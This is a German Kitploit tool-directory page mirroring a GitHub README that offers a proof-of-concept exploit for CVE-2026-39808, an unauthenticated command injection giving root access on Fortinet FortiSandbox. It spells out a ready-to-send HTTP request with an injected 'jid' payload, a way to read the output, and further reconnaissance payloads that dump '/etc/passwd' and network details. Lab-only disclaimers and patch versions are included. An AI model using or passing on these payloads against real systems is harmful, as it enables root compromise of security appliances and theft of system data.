Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-39808 — CVE-2026-39808 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2026-39808
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungPayload-EntwicklungLabs & Praxis
GitHub0xblackash/cve-2026-39808

CVE-2026-39808

CVE-2026-39808

Repository anzeigen
22vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 FortiSandbox Root Sandbox Escape - CVE-2026-39808

1765359501378
Status CVE Affected Versions

🎯 Überblick

Dieses Repository enthält einen sauberen und gut dokumentierten Proof of Concept für CVE-2026-39808 — eine kritische, nicht authentifizierte Command-Injection-Schwachstelle in Fortinet FortiSandbox, die Sandbox-Escape und Remote-Codeausführung als root (uid=0) ermöglicht.

Was dieser PoC zeigt:

  • Path Traversal + Command Injection über den Parameter jid
  • Sandbox-Breakout aus der Analyseumgebung
  • Ausführung beliebiger Befehle mit Root-Rechten
  • Lesen von Systemdateien und Netzwerkinformationen

📸 Demo

CVE-2026-39808 1 CVE-2026-39808 0 CVE-2026-39808 3 CVE-2026-39808 2 CVE-2026-39808 4

Erfolgreiche Ausnutzung mit uid=0 gid=0 groups=0


🚀 Betroffene Versionen

VersionsbereichStatus
FortiSandbox 4.4.0 – 4.4.8Verwundbar
FortiSandbox 5.0.0 – 5.0.5Verwundbar
4.4.9+ / 5.0.6+Behoben

🛠️ Verwendung (nur im Labor)

1. Einfaches Payload (empfohlen)

root@kitploit:~
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip

2. Ergebnis anzeigen

Im Browser öffnen:

root@kitploit:~
https://your-lab-ip/ng/out.txt

3. Erweiterte Payload-Beispiele

root@kitploit:~
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|

# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|

📁 Repository-Inhalt

  • poc.py → Automatisierter Python-Exploit
  • burp-request.txt → Einsatzbereite Burp-Suite-Anfrage
  • payloads.md → Sammlung nützlicher Payloads
  • screenshots/ → Schritt-für-Schritt-Screenshots der Exploitation
  • README.md → Diese Datei

⚠️ Wichtige Hinweise

  • Nur für Bildungs- und Laborzwecke
  • Verwende dies NICHT auf Produktions- oder nicht autorisierten Systemen
  • Hole dir vor dem Testen immer die entsprechende Genehmigung
  • Patche deine FortiSandbox auf Version 4.4.9+ oder 5.0.6+

🛡️ Gegenmaßnahmen

Aktualisiere FortiSandbox sofort auf eine der folgenden Versionen:

  • 4.4.9 oder höher
  • 5.0.6 oder höher

Fortinet hat offizielle Patches veröffentlicht, die diese Schwachstelle beheben.


Erstellt für Forschungs- und Lernzwecke
⭐ Gib diesem Repository einen Stern, wenn es dir geholfen hat!

Tool herunterladen